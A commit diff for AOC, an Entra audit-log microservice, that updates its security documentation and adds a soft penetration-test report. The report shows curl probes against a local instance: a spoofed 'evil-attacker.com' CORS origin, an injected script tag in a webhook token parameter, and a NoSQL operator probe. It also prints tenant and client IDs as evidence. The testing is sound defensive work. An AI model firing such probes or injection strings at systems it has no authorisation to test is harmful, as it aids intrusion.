docs: update AGENTS.md, README.md, DEPLOY.md, ROADMAP.md for v1.7.14 security features

v1.7.14: LLM/SIEM domain allowlists, SRI hashes, auth misconfig warning, Azure Key Vault integration
v1.7.13: switch Alpine.js to CSP build, remove unsafe-eval from CSP
2026-04-27 16:52:35 +02:00 · 2026-04-27 16:45:06 +02:00 · 2026-04-27 16:08:34 +02:00 · 2026-04-27 14:19:28 +02:00 · 2026-04-27 10:39:33 +02:00 · 2026-04-27 10:32:35 +02:00
23 changed files with 1148 additions and 58 deletions
--- a/.env.example
+++ b/.env.example
@@ -27,6 +27,18 @@ RETENTION_DAYS=0
 # Optional: comma-separated CORS origins (e.g., http://localhost:3000,https://app.example.com)
 CORS_ORIGINS=*

+# OpenAPI docs exposure (set true only for dev)
+DOCS_ENABLED=false
+
+# LLM endpoint domain restriction (comma-separated, supports wildcards like *.openai.azure.com)
+# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
+
+# SIEM webhook domain restriction (comma-separated)
+# SIEM_ALLOWED_DOMAINS=your-siem.com
+
+# Optional Azure Key Vault for secrets storage
+# AZURE_KEY_VAULT_NAME=your-keyvault-name
+
 # Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook)
 SIEM_ENABLED=false
 SIEM_WEBHOOK_URL=
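
The `LLM_ALLOWED_DOMAINS` and `SIEM_ALLOWED_DOMAINS` settings above take comma-separated host patterns with optional wildcards. The following is a minimal sketch of how such a check could work, not the code in this commit: the function names are hypothetical, and the HTTPS and private-IP rules are taken from the SSRF guard described in `AGENTS.md`. It does not resolve DNS, so a hostname that resolves to a private address is not caught here.

```python
from fnmatch import fnmatch
from ipaddress import ip_address
from urllib.parse import urlparse


def parse_allowlist(raw: str) -> list[str]:
    """Split a comma-separated env value into lowercase host patterns."""
    return [part.strip().lower() for part in raw.split(",") if part.strip()]


def is_url_allowed(url: str, allowed_domains: list[str]) -> bool:
    """Hypothetical guard: HTTPS only, no private/loopback IP literals, optional allowlist."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme != "https" or not host:
        return False
    try:
        ip = ip_address(host)
    except ValueError:
        ip = None  # host is a DNS name, not an IP literal
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local):
        return False
    if not allowed_domains:
        return True  # the allowlist is optional; an empty list means "no restriction"
    # Shell-style matching: "*" also matches dots, so "*.openai.azure.com"
    # accepts "a.b.openai.azure.com" but not the bare "openai.azure.com".
    return any(fnmatch(host, pattern) for pattern in allowed_domains)
```

For example, `is_url_allowed("https://myres.openai.azure.com/v1", parse_allowlist("api.openai.com,*.openai.azure.com"))` passes, while the same URL over plain `http` is rejected before the allowlist is consulted.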
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -9,20 +9,24 @@ AOC is a FastAPI microservice that ingests Microsoft Entra (Azure AD) audit logs
 - **Runtime**: Python 3.11 (3.14 for tests)
 - **Web Framework**: FastAPI + Uvicorn (Gunicorn in production)
 - **Database**: MongoDB (PyMongo)
+- **Cache/Queue**: Valkey/Redis 8 (caching + arq async job queue)
 - **Frontend**: Alpine.js + HTML/CSS (served as static files from `backend/frontend/`)
 - **Authentication**: Optional OIDC Bearer token validation against Microsoft Entra (using `python-jose` and MSAL.js on the frontend)
 - **External APIs**: Microsoft Graph API, Office 365 Management Activity API, Azure OpenAI / MS Foundry
 - **Deployment**: Docker Compose (dev), Docker Compose + nginx (prod)
 - **CI/CD**: Gitea Actions (lint + test + Docker build + release)
+- **Secrets Storage**: Environment variables (`.env`) or optional Azure Key Vault

 ## Project Structure

 ```
 backend/
  main.py              # FastAPI app, router registration, background periodic fetch
-  config.py            # Pydantic Settings configuration (loads .env)
+  config.py            # Pydantic Settings configuration (loads .env + optional Key Vault)
  database.py          # MongoClient setup (db = micro_soc, collection = events)
  auth.py              # OIDC Bearer token validation, JWKS caching, role/group checks
+  secrets_manager.py   # Optional Azure Key Vault integration for secrets
+  rate_limiter.py      # Redis-backed fixed-window rate limiter (fail-closed)
  requirements.txt     # Python dependencies
  Dockerfile           # python:3.11-slim image, non-root user, version baked at build
  mcp_server.py        # Standalone MCP server for Claude Desktop / Cursor integration
@@ -34,6 +38,9 @@ backend/
    health.py          # GET /health, GET /metrics
    rules.py           # Rule-based alerting endpoints
    webhooks.py        # Microsoft Graph change notification webhooks
+    alerts.py          # Alert management endpoints
+    saved_searches.py  # Saved filter presets
+    jobs.py            # Async job status polling
  graph/
    auth.py            # Client credentials token acquisition for Graph
    audit_logs.py      # Fetch and enrich directory audit logs from Graph
@@ -59,16 +66,42 @@ Copy `.env.example` to `.env` at the repo root and fill in values:
 cp .env.example .env
 ```

-Key variables:
+### Core variables
 - `TENANT_ID`, `CLIENT_ID`, `CLIENT_SECRET` — Microsoft app registration credentials (application permissions)
 - `AUTH_ENABLED` — set `true` to protect API/UI with OIDC Bearer tokens
 - `AUTH_TENANT_ID`, `AUTH_CLIENT_ID` — token validation audience/issuer
 - `AUTH_ALLOWED_ROLES`, `AUTH_ALLOWED_GROUPS` — comma-separated access control lists
 - `ENABLE_PERIODIC_FETCH`, `FETCH_INTERVAL_MINUTES` — background ingestion scheduler
 - `MONGO_ROOT_USERNAME`, `MONGO_ROOT_PASSWORD`, `MONGO_PORT` — used by Docker Compose for MongoDB
+
+### AI / LLM variables
 - `AI_FEATURES_ENABLED` — set `false` to completely disable AI endpoints and UI (default `true`)
 - `LLM_API_KEY`, `LLM_BASE_URL`, `LLM_MODEL`, `LLM_MAX_EVENTS`, `LLM_TIMEOUT_SECONDS` — LLM provider settings
 - `LLM_API_VERSION` — required for Azure OpenAI / MS Foundry endpoints
+- `LLM_ALLOWED_DOMAINS` — comma-separated domain allowlist for LLM endpoints (e.g. `api.openai.com,*.openai.azure.com`)
+
+### Security variables
+- `CORS_ORIGINS` — comma-separated allowed origins (default `*`; set explicit origins in production)
+- `DOCS_ENABLED` — set `true` to expose `/docs`, `/redoc`, `/openapi.json` (default `false`)
+- `METRICS_ALLOWED_IPS` — comma-separated CIDRs allowed to access `/metrics` (default: private networks + loopback)
+- `WEBHOOK_CLIENT_SECRET` — secret for validating Graph webhook `clientState`
+- `SIEM_ENABLED`, `SIEM_WEBHOOK_URL` — optional SIEM forwarding
+- `SIEM_ALLOWED_DOMAINS` — comma-separated domain allowlist for SIEM webhook URLs
+- `RATE_LIMIT_ENABLED`, `RATE_LIMIT_REQUESTS`, `RATE_LIMIT_WINDOW_SECONDS` — Redis-backed rate limiting
+
+### Optional Azure Key Vault
+- `AZURE_KEY_VAULT_NAME` — name of the Azure Key Vault to load secrets from
+- When set, AOC fetches these secrets at startup:
+  - `aoc-client-secret` → `CLIENT_SECRET`
+  - `aoc-llm-api-key` → `LLM_API_KEY`
+  - `aoc-mongo-uri` → `MONGO_URI`
+  - `aoc-webhook-client-secret` → `WEBHOOK_CLIENT_SECRET`
+- Requires `azure-identity` and `azure-keyvault-secrets` (uncomment in `requirements.txt`)
+
+### Privacy / access control
+- `PRIVACY_SERVICES` — comma-separated services to hide from non-privileged users (e.g. `Exchange,Teams`)
+- `PRIVACY_SENSITIVE_OPERATIONS` — comma-separated operations to gate
+- `PRIVACY_SERVICE_ROLES` — comma-separated Entra roles that grant access to privacy data

 ## Build and Run Commands

@@ -102,7 +135,9 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000
 - `GET /api/config/features` — feature flags (`ai_features_enabled`)
 - `POST /api/ask` — natural language query; returns LLM narrative + referenced events (only when `AI_FEATURES_ENABLED=true`)
 - `GET /health` — liveness probe with DB connectivity
- `GET /metrics` — Prometheus metrics
+- `GET /metrics` — Prometheus metrics (IP-restricted by default)
+- `GET /api/source-health` — last fetch status per ingestion source
+- `GET /api/version` — running version

 ## MCP Server

@@ -162,16 +197,30 @@ When adding new features or bug fixes, add or update tests in `backend/tests/`.
 - Auth middleware and token validation
 - API endpoints (`/api/events`, `/api/fetch-audit-logs`, `/api/ask`)
 - NLQ time range extraction, entity extraction, query building
+- Rate limiting behavior

 ## Security Considerations

- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env`. Never commit `.env`.
- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer claims. Tokens are decoded without strict signature verification (`jwt.get_unverified_claims`), so the tenant and issuer checks are the primary gate.
- **Role/Group gating**: Access is allowed if the token’s `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed.
+- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env` or Azure Key Vault. Never commit `.env`.
+- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer/audience claims. Tokens are decoded with RS256 signature verification.
+- **Role/Group gating**: Access is allowed if the token's `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed — a startup warning is logged in this case.
+- **CORS**: When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, `allow_credentials` is forced to `false` to prevent cross-origin token leakage.
+- **Rate limiting**: Redis-backed fixed-window rate limiting with per-category limits (fetch=10/hr, ask=30/min, write=20/min, default=120/min). Fails closed (returns 429) when Redis is unavailable.
 - **Pagination limits**: `page_size` is clamped to a maximum of 500 to prevent large queries.
 - **Fetch window cap**: `hours` is clamped to 720 (30 days) to avoid runaway API calls.
+- **LLM SSRF guard**: `LLM_BASE_URL` must be HTTPS and cannot point to private IPs. Optional `LLM_ALLOWED_DOMAINS` restricts to specific domains.
+- **SIEM SSRF guard**: `SIEM_WEBHOOK_URL` has the same validation as LLM URLs, plus optional `SIEM_ALLOWED_DOMAINS`.
+- **Metrics IP gating**: `/metrics` is restricted to private/loopback IPs by default via `METRICS_ALLOWED_IPS`.
+- **OpenAPI docs**: Disabled by default (`DOCS_ENABLED=false`). Enable only in development.
+- **CSP**: Content-Security-Policy headers are set on all responses. As of v1.7.13 the frontend uses the Alpine.js CSP build, so `script-src` no longer includes `unsafe-eval`.
+- **SRI**: CDN scripts (Alpine.js, MSAL.js) include Subresource Integrity hashes to prevent supply chain compromise.
 - **MCP server**: The MCP server bypasses auth entirely. Only run it in trusted environments or behind a VPN.

+### Security Documentation
+
+- `PEN_TEST_REPORT_v1.7.11.md` — Internal soft penetration test findings and remediation
+- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra/token abuse vectors
+
 ## Maintenance and Operations

 The `backend/maintenance.py` script provides two CLI commands useful for backfilling or correcting stored data:
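
The rate-limiting bullet in the `AGENTS.md` security notes above describes a Redis-backed fixed-window limiter that fails closed. A rough sketch of that behavior follows, under stated assumptions: `check_rate_limit`, `RateLimited`, and the key layout are hypothetical names, and the client only needs `incr` and `expire`, which redis-py clients provide. The two small classes at the end are stand-ins for illustration, not part of the project.

```python
import time


class RateLimited(Exception):
    """Signals that the caller should respond with HTTP 429."""


def check_rate_limit(client, key, limit, window_seconds, now=None):
    """Count one request in the current fixed window; raise RateLimited if over the limit."""
    now = time.time() if now is None else now
    window_index = int(now // window_seconds)  # all requests in one window share a bucket
    bucket = f"ratelimit:{key}:{window_index}"
    try:
        count = client.incr(bucket)
        if count == 1:
            # First hit in this window: let the bucket expire with the window.
            client.expire(bucket, window_seconds)
    except Exception as exc:
        # Fail closed: a backend error rejects the request instead of allowing it.
        raise RateLimited("rate limiter backend unavailable") from exc
    if count > limit:
        raise RateLimited(f"{key}: {count} requests in window, limit is {limit}")
    return count


class InMemoryCounter:
    """Illustrative stand-in for a Redis client (no real expiry)."""

    def __init__(self):
        self.counts = {}

    def incr(self, name):
        self.counts[name] = self.counts.get(name, 0) + 1
        return self.counts[name]

    def expire(self, name, seconds):
        return True


class BrokenBackend:
    """Illustrative stand-in for an unreachable Redis."""

    def incr(self, name):
        raise ConnectionError("redis down")

    def expire(self, name, seconds):
        raise ConnectionError("redis down")
```

With `BrokenBackend`, every call raises `RateLimited`, which is the trade-off the docs call out: a Redis outage blocks traffic rather than removing the limit.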
--- a/DEPLOY.md
+++ b/DEPLOY.md
@@ -7,6 +7,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 - **nginx** — reverse proxy, TLS termination, static file serving
 - **backend** — FastAPI application (Gunicorn + Uvicorn workers)
 - **mongo** — MongoDB data store (not exposed externally)
+- **valkey** — Redis-compatible cache and async job queue (not exposed externally)

 ## Prerequisites

@@ -20,7 +21,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 1. **Clone / pull the latest release**

   ```bash
-   git checkout v1.1.0
+   git checkout v1.7.14
   ```

 2. **Copy and edit environment variables**
@@ -33,7 +34,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 3. **Set the release version**

   ```bash
-   export AOC_VERSION=v1.1.0
+   export AOC_VERSION=v1.7.14
   ```

 4. **Deploy**
@@ -53,7 +54,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
 ## Updating to a new release

 ```bash
-export AOC_VERSION=v1.2.0
+export AOC_VERSION=v1.7.14
 docker compose -f docker-compose.prod.yml pull
 docker compose -f docker-compose.prod.yml up -d
 ```
@@ -75,24 +76,56 @@ docker compose -f docker-compose.prod.yml up -d

 Replace the `nginx` service in `docker-compose.prod.yml` with a Certbot-friendly setup (e.g., use the `nginx-proxy` + `acme-companion` stack) or mount the Certbot certificates into `nginx/ssl/`.

-## Security hardening
+## Security Hardening

 - MongoDB is **not exposed** to the host — only the backend container can reach it.
+- Valkey/Redis is **not exposed** to the host — only the backend container can reach it.
 - The backend runs as a non-root (`aoc`) user inside the container.
 - nginx adds security headers (`X-Frame-Options`, `X-Content-Type-Options`, etc.).
 - Keep `.env` out of version control — it is listed in `.gitignore`.
+- Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access to admin/security roles.
+- Set explicit `CORS_ORIGINS` — do not use `*` in production when auth is enabled.
+- Set `DOCS_ENABLED=false` to hide OpenAPI docs (`/docs`, `/openapi.json`).
+- Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications.
+- Set `LLM_ALLOWED_DOMAINS` if using AI features (e.g. `api.openai.com,*.openai.azure.com`).
+- Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding.
+- Review `METRICS_ALLOWED_IPS` — defaults to private networks + loopback.
+
+## Azure Key Vault (Optional)
+
+To eliminate long-lived secrets from `.env`:
+
+1. Create an Azure Key Vault and add these secrets:
+   - `aoc-client-secret` — your Graph app `CLIENT_SECRET`
+   - `aoc-llm-api-key` — your `LLM_API_KEY` (if using AI)
+   - `aoc-mongo-uri` — your `MONGO_URI`
+   - `aoc-webhook-client-secret` — your `WEBHOOK_CLIENT_SECRET`
+
+2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
+
+3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
+
+4. Grant the container identity `Get` permission on secrets:
+   - If using Azure Container Instances / AKS: assign a managed identity
+   - If using VM: assign a managed identity or use a service principal
+   - If using local Docker: authenticate via `az login` on the host
+
+5. Rebuild and redeploy:
+   ```bash
+   docker compose -f docker-compose.prod.yml up -d --build
+   ```

 ## Rollback

 ```bash
-export AOC_VERSION=v1.0.3
+export AOC_VERSION=v1.7.13
 docker compose -f docker-compose.prod.yml pull
 docker compose -f docker-compose.prod.yml up -d
 ```

 ## Monitoring

- Prometheus metrics: `http://your-host/metrics`
+- Prometheus metrics: `http://your-host/metrics` (IP-restricted by default)
 - Health check: `http://your-host/health`
 - Container logs:

@@ -100,4 +133,13 @@ docker compose -f docker-compose.prod.yml up -d
  docker compose -f docker-compose.prod.yml logs -f backend
  docker compose -f docker-compose.prod.yml logs -f nginx
  docker compose -f docker-compose.prod.yml logs -f mongo
+  docker compose -f docker-compose.prod.yml logs -f valkey
  ```
+
+## Troubleshooting
+
+- **Auth warning in logs**: "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured" — set these to restrict access.
+- **CORS issues**: Set `CORS_ORIGINS` to your exact frontend origin(s). A wildcard combined with `AUTH_ENABLED=true` forces `allow_credentials` to `false`.
+- **Rate limiting 429s**: Check Redis/Valkey connectivity. The rate limiter fails closed (returns 429) when Redis is down.
+- **LLM errors**: If `LLM_ALLOWED_DOMAINS` is configured, verify that the host of `LLM_BASE_URL` matches one of its entries.
+- **SIEM not forwarding**: Verify `SIEM_WEBHOOK_URL` uses HTTPS and is in `SIEM_ALLOWED_DOMAINS`.
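
The Key Vault section of `DEPLOY.md` above maps four vault secret names to environment variables. The sketch below illustrates that mapping only; it is not `secrets_manager.py`. `load_secrets` and its `fetch` parameter are hypothetical, and the choice to let a vault value override `.env` while falling back to `.env` on errors is an assumption, not documented behavior.

```python
from typing import Callable, Mapping, Optional

# Vault secret name -> setting name, as listed in the docs above.
SECRET_TO_ENV = {
    "aoc-client-secret": "CLIENT_SECRET",
    "aoc-llm-api-key": "LLM_API_KEY",
    "aoc-mongo-uri": "MONGO_URI",
    "aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
}


def load_secrets(
    fetch: Callable[[str], Optional[str]], env: Mapping[str, str]
) -> dict[str, str]:
    """Return a copy of env with any secrets that fetch() can provide layered on top."""
    merged = dict(env)
    for secret_name, env_name in SECRET_TO_ENV.items():
        try:
            value = fetch(secret_name)
        except Exception:
            value = None  # assumption: a missing or unreadable secret keeps the .env value
        if value:
            merged[env_name] = value
    return merged


# With the Azure SDK installed, fetch could be built roughly like this:
#   from azure.identity import DefaultAzureCredential
#   from azure.keyvault.secrets import SecretClient
#   client = SecretClient(
#       vault_url=f"https://{vault_name}.vault.azure.net",
#       credential=DefaultAzureCredential(),
#   )
#   fetch = lambda name: client.get_secret(name).value
```

Passing `fetch` in as a callable keeps the mapping testable without the optional Azure dependencies, which matches their commented-out status in `requirements.txt`.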
--- a/PEN_TEST_REPORT_v1.7.11.md
+++ b/PEN_TEST_REPORT_v1.7.11.md
@@ -0,0 +1,203 @@
+# AOC v1.7.11 Soft Penetration Test Report
+
+**Date:** 2026-04-27
+**Target:** Local AOC instance (port 8001), auth disabled, AI disabled
+**Tester:** Automated + manual curl-based probing
+**Scope:** FastAPI backend, REST API endpoints, middleware, headers
+
+---
+
+## Executive Summary
+
+AOC v1.7.11 has one **CRITICAL** vulnerability (CORS credentials leak) and several defense-in-depth gaps. The good news: input validation, NoSQL injection resistance, and error handling are solid. The bad news: CORS is dangerously permissive, security headers are missing, and the rate limiter fails open on Redis failure.
+
+| Severity | Count | Categories |
+|----------|-------|------------|
+| CRITICAL | 1 | CORS with credentials |
+| HIGH | 1 | Missing security headers |
+| MEDIUM | 2 | Fail-open rate limiter, OpenAPI exposure |
+| LOW | 2 | Information disclosure, webhook content injection |
+| INFO | 5 | Positive findings (no stack traces, input validation, NoSQL resistance, bulk-tag cap, rate limiting with healthy Redis) |
+
+---
+
+## CRITICAL
+
+### 1. CORS Reflects Any Origin with `allow_credentials=true`
+
+**Finding:** The CORS middleware returns `Access-Control-Allow-Origin: <any origin>` AND `Access-Control-Allow-Credentials: true` for every origin that sends an `Origin` header.
+
+**Evidence:**
+```bash
+curl -H "Origin: https://evil-attacker.com" http://localhost:8001/api/config/auth
+# Response headers:
+# access-control-allow-origin: https://evil-attacker.com
+# access-control-allow-credentials: true
+```
+
+**Impact:** An attacker can host a malicious page on any domain and make authenticated cross-origin requests to the AOC API using the victim's browser cookies/tokens. This effectively bypasses Same-Origin Policy for authenticated actions.
+
+**Root Cause:** `main.py` configures CORS with `allow_origins=["*"]` (from the `CORS_ORIGINS` env var, default `"*"`) and `allow_credentials=True`. Under the CORS specification, a wildcard origin combined with credentials is invalid, but Starlette/FastAPI appears to reflect the request origin instead.
+
+**Recommendation:**
+- When `AUTH_ENABLED=true`, reject requests from origins not in an explicit allowlist.
+- Set `allow_credentials=False` if wildcard origins are needed.
+- Or, require `CORS_ORIGINS` to be explicitly configured (no default wildcard) when auth is enabled.
+
+---
+
+## HIGH
+
+### 2. Missing Security Headers
+
+**Finding:** The following security headers are absent from all responses:
+
+| Header | Purpose | Status |
+|--------|---------|--------|
+| `X-Content-Type-Options: nosniff` | Prevents MIME sniffing | MISSING |
+| `X-Frame-Options: DENY` or `SAMEORIGIN` | Clickjacking protection | MISSING |
+| `Strict-Transport-Security` | HSTS enforcement | MISSING |
+| `Referrer-Policy: strict-origin-when-cross-origin` | Limits referrer leakage | MISSING |
+| `Permissions-Policy` | Restricts browser features | MISSING |
+
+**Impact:** Increased attack surface for clickjacking, MIME confusion attacks, and information leakage via referrer headers.
+
+**Recommendation:** Add a security headers middleware to set these on all responses. HSTS only when served over HTTPS.
+
+---
+
+## MEDIUM
+
+### 3. Rate Limiter Fails Open on Redis Failure
+
+**Finding:** In `rate_limiter.py`, lines 81-82:
+```python
+except Exception as exc:
+    logger.warning("Rate limiter Redis error; allowing request", error=str(exc))
+```
+
+If Redis becomes unreachable, all rate limits are silently bypassed.
+
+**Evidence:** When Redis was down, 150+ requests to `/api/events` all returned 200 with no 429s.
+
+**Impact:** A DoS on Redis (or a network partition) removes all rate limiting, allowing unlimited API abuse.
+
+**Recommendation:** Make the rate limiter fail-closed: return 429 or 503 when Redis is unavailable, or use an in-memory fallback with a conservative limit.
+
+### 4. OpenAPI Schema Publicly Exposed
+
+**Finding:** `/docs`, `/redoc`, and `/openapi.json` are accessible without authentication and return the full API schema.
+
+**Evidence:**
+```bash
+curl -s http://localhost:8001/openapi.json | jq '.paths | keys'
+# Returns all 15+ API paths including internal endpoints
+```
+
+**Impact:** Attackers get a complete map of the API, including request/response schemas, parameter types, and endpoint structure. This significantly reduces reconnaissance time.
+
+**Recommendation:** Disable OpenAPI docs in production (`docs_url=None, redoc_url=None, openapi_url=None`) or gate them behind admin authentication.
+
+---
+
+## LOW
+
+### 5. Information Disclosure via `/api/config/auth` and `/metrics`
+
+**Finding:**
+- `/api/config/auth` leaks `tenant_id` and `client_id` even when auth is disabled. These values fall back to the Graph API credentials (`TENANT_ID`/`CLIENT_ID`), which may be sensitive.
+- `/metrics` exposes Python version (`3.14.3`), GC statistics, and application-internal metric names.
+
+**Evidence:**
+```json
+{
+  "auth_enabled": false,
+  "tenant_id": "0ec9f34c-17c8-4541-b084-7d64ecdcc997",
+  "client_id": "cc31fd45-1eca-431f-a2c6-ba81cd4c5d50"
+}
+```
+
+**Impact:** Low direct impact (tenant/client IDs are not secrets), but the values aid reconnaissance by telling an attacker exactly which tenant and app registration to target.
+
+**Recommendation:**
+- Return empty strings for `tenant_id`/`client_id` when `auth_enabled=false`.
+- Gate `/metrics` behind IP allowlist or admin auth (standard Prometheus practice).
+
+### 6. Webhook Validation Token Echoed Without Sanitization
+
+**Finding:** The `/api/webhooks/graph` endpoint echoes `validationToken` query parameter as `text/plain` without any sanitization or length limits.
+
+**Evidence:**
+```bash
+curl -X POST "http://localhost:8001/api/webhooks/graph?validationToken=<script>alert(1)</script>"
+# Returns: <script>alert(1)</script> with Content-Type: text/plain
+```
+
+**Impact:** Low in the intended Microsoft Graph flow (token is Microsoft-generated), but if the endpoint is hit directly, an attacker could use this for cache poisoning, response splitting, or social engineering by making the endpoint return attacker-controlled content.
+
+**Recommendation:** Validate the `validationToken` format (e.g., JWT-like structure, length limits) before echoing it, or set `Content-Type: text/plain; charset=utf-8` with `X-Content-Type-Options: nosniff` to reduce MIME confusion risk.
+
+---
+
+## INFO (Positive Findings)
+
+### A. No Stack Traces in Error Responses
+
+All errors (422, 404, 429, 500 if triggered) return generic JSON messages without internal details or stack traces. Good.
+
+### B. Pydantic Input Validation is Effective
+
+- `page_size` capped at 500 (returns 422 for 501, 0, -1)
+- `hours` capped at 720 (returns 422 for 721)
+- Invalid cursors return 400 with "Invalid cursor"
+- Malformed JSON bodies return 422 with field-level validation errors
+- `AlertCondition` op field strictly validated against `Literal["eq", "neq", "contains", "in", "after_hours"]`
+
+### C. NoSQL Injection Resistant
+
+MongoDB operators passed as string filter values are treated as literals, not operators:
+
+```bash
+curl "http://localhost:8001/api/events?operation=\$ne"
+# Returns 0 results (treated as literal string "$ne")
+```
+
+The `_build_query()` function in `events.py` uses `re.escape()` for search input and constructs queries safely.
+
+### D. Bulk Tags Pre-Count Check Works
+
+`bulk_tags` endpoint capped at 10,000 matched documents via pre-count check. 93 events were successfully tagged with no bypass.
+
+### E. Rate Limiting Works When Redis is Healthy
+
+- `/api/fetch-audit-logs`: 429 after 11 requests (limit: 10/hr)
+- `/api/events`: 429 after ~120 requests (limit: 120/min)
+- Exempt paths work correctly: `/health`, `/metrics`, `/api/config/auth`, `/api/config/features`
+- `Retry-After` header is returned on 429 responses
+
+---
+
+## Recommendations Summary
+
+| Priority | Action | Effort |
+|----------|--------|--------|
+| P0 | Fix CORS: do not allow credentials with wildcard/reflected origins | Small |
+| P1 | Add security headers middleware (X-Content-Type-Options, X-Frame-Options, HSTS, Referrer-Policy) | Small |
+| P2 | Make rate limiter fail-closed on Redis errors | Small |
+| P2 | Disable OpenAPI docs in production or gate behind auth | Small |
+| P3 | Sanitize or validate webhook validationToken before echo | Small |
+| P3 | Gate `/metrics` behind IP allowlist | Small |
+| P3 | Hide tenant_id/client_id from `/api/config/auth` when auth is disabled | Tiny |
+| P4 | Consider Alpine.js CSP build to remove `unsafe-eval` from script-src | Medium |
+
+---
+
+## Test Environment
+
+```
+Backend: uvicorn on localhost:8001 (auth=false, ai=false)
+MongoDB: docker container, port 27018
+Redis:   docker container, port 6380
+```
+
+*Test commands and raw outputs available in `/tmp/pen_test*.sh` scripts.*
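
Finding 1 in the report above recommends never combining credentials with a wildcard origin. The decision can be sketched as follows, assuming a hypothetical helper `cors_settings`. The keys it returns match the `allow_origins` and `allow_credentials` parameters of Starlette's `CORSMiddleware`, but the actual wiring in `main.py` is not shown in this diff.

```python
def cors_settings(cors_origins: str, auth_enabled: bool) -> dict:
    """Derive CORS middleware arguments from the CORS_ORIGINS and AUTH_ENABLED settings."""
    origins = [o.strip() for o in cors_origins.split(",") if o.strip()]
    wildcard = "*" in origins
    # Credentials stay enabled unless auth is on AND any origin is accepted,
    # which is the combination the pen test flagged as critical.
    allow_credentials = not (auth_enabled and wildcard)
    return {"allow_origins": origins, "allow_credentials": allow_credentials}


# Possible use with FastAPI (not executed here):
#   from fastapi.middleware.cors import CORSMiddleware
#   app.add_middleware(CORSMiddleware, **cors_settings(settings_value, auth_flag))
```

A stricter variant would also disable credentials for a wildcard when auth is off; the sketch follows the narrower rule stated in the docs.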
--- a/README.md
+++ b/README.md
@@ -11,13 +11,14 @@ FastAPI microservice that ingests Microsoft Entra (Azure AD) and other admin aud
 - Optional OIDC bearer auth (Entra) to protect the API/UI and gate access by roles/groups.
 - Natural language query (`/api/ask`) powered by LLM (OpenAI, Azure OpenAI, or any compatible API).
 - MCP server for Claude Desktop / Cursor integration.
+- Optional Azure Key Vault integration for secrets storage.

 ## Prerequisites (macOS)
 - Python 3.11
 - Docker Desktop (for the quickest start) or a local MongoDB instance
 - An Entra app registration with **Application** permission `AuditLog.Read.All` and admin consent granted
  - Also required to fetch other sources:
-    - `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registration’s API permissions for Office 365 Management APIs)
+    - `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registration's API permissions for Office 365 Management APIs)
    - Intune audit: `DeviceManagementConfiguration.Read.All` (or broader) for `/deviceManagement/auditEvents`
  - Optional API protection: configure `AUTH_ENABLED=true` and set `AUTH_TENANT_ID`/`AUTH_CLIENT_ID` (the audience) plus allowed roles/groups.

@@ -49,8 +50,43 @@ cp .env.example .env
 # LLM_BASE_URL=https://api.openai.com/v1
 # LLM_MODEL=gpt-4o-mini
 # LLM_TIMEOUT_SECONDS=30
+# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
+
+# Optional: SIEM forwarding
+# SIEM_ENABLED=true
+# SIEM_WEBHOOK_URL=https://your-siem.com/webhook
+# SIEM_ALLOWED_DOMAINS=your-siem.com
+
+# Optional: Azure Key Vault for secrets storage
+# AZURE_KEY_VAULT_NAME=your-keyvault-name
 ```

+### Using Azure Key Vault for secrets
+Instead of storing `CLIENT_SECRET`, `LLM_API_KEY`, `MONGO_URI`, and `WEBHOOK_CLIENT_SECRET` in `.env`, you can store them in Azure Key Vault:
+
+1. Create a Key Vault and add secrets with these names:
+   - `aoc-client-secret` → your Graph app `CLIENT_SECRET`
+   - `aoc-llm-api-key` → your `LLM_API_KEY`
+   - `aoc-mongo-uri` → your `MONGO_URI`
+   - `aoc-webhook-client-secret` → your `WEBHOOK_CLIENT_SECRET`
+2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
+3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
+4. Ensure the container has Azure identity credentials (managed identity, service principal, or Azure CLI auth)
+
+## Security Hardening Checklist
+
+Before deploying to production:
+
+- [ ] Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access
+- [ ] Set explicit `CORS_ORIGINS` (do not use `*` in production with auth enabled)
+- [ ] Set `DOCS_ENABLED=false` (default) to hide OpenAPI docs
+- [ ] Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications
